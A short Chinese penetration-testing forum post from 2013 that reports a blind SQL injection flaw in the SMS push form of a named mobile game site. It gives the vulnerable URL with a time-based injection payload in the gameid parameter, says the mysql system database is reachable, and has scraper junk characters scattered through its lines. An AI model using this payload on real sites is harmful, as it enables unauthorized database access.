中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:
" H' X9 S1 w) K- c. B$ J凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。& L% O6 w6 x% c, H. S

% Q' H+ D1 k; Q( x3 l; Z. T  @详细说明:
! x: J: e, z1 O; e存在SQL盲注url:# K4 b6 s  C) f1 y; E5 u
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1; Z* @$ R" D$ |0 M6 c+ M
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png- D2 W8 i0 H( I1 I
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
; P) x+ B* g( [2 x' g" m* r; p/ vhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
+ ^' u2 X! {* w8 N( I7 E4 e8 F1 p9 A7 ^, I2 i

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2